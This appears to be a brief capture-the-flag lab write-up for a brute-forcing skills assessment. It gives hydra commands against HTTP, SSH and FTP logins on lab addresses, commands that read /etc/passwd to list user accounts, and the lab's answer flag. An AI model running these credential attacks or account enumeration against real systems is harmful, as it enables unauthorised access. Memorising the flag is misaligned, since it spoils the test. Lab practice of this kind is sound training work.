Skills Assessment Part 1
The first part of the skills assessment will require you to brute-force the the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.
You might find the following wordlists helpful in this engagement: usernames.txt and passwords.txt
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt \ http-get://94.237.48.12:55458/ -t 16 -f -V


Skills Assessment Part 2
This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance. After using username “satwossh” we brute force for password
hydra -l satwossh -P 2023-200_most_used_passwords.txt ssh://94.237.48.12:33999

After that we get access to the target through ssh
some trick here:
use this command in order to see users reals are there what exists in the session SSH associated with the service FTP, this command
awk -F: '$3 >= 1000 && $7 !~ /nologin|false/' /etc/passwd
cat /etc/passwd | cut -d: -f1

keep continue brute forcing with username “thomas”
hydra -l thomas -P password_list.txt ftp://192.168.112.164


flag: HTB{brut3f0rc1ng_succ3ssful}